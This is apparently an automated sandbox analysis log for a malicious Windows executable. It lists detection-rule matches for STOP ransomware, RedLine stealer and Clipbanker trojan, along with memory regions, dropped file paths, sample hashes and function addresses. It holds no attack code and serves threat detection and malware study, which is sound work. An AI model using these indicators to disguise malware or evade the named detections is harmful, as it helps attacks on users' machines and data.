Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.349827384.00000000004B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.348844154.000000000210E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.318350093.00000000020FB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_0040706A	0_2_0040706A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_004082BA	0_2_004082BA
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040D240	1_2_0040D240
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00419F90	1_2_00419F90
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040C070	1_2_0040C070
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0042E003	1_2_0042E003
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0042F010	1_2_0042F010
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00410160	1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_004021C0	1_2_004021C0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0044237E	1_2_0044237E
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_004344FF	1_2_004344FF
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00449506	1_2_00449506
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0043E5A3	1_2_0043E5A3
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0044B5B1	1_2_0044B5B1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040A660	1_2_0040A660
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0041E690	1_2_0041E690
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00402750	1_2_00402750
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040A710	1_2_0040A710
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040F730	1_2_0040F730
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0044D7A1	1_2_0044D7A1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0042C804	1_2_0042C804
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00481920	1_2_00481920
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0044D9DC	1_2_0044D9DC
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00449A71	1_2_00449A71
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00443B40	1_2_00443B40
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00402B80	1_2_00402B80
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0044ACFF	1_2_0044ACFF
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040DD40	1_2_0040DD40
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040BDC0	1_2_0040BDC0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0042CE51	1_2_0042CE51
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00420F30	1_2_00420F30
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00449FE3	1_2_00449FE3

Source: U59WtZz2Sg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
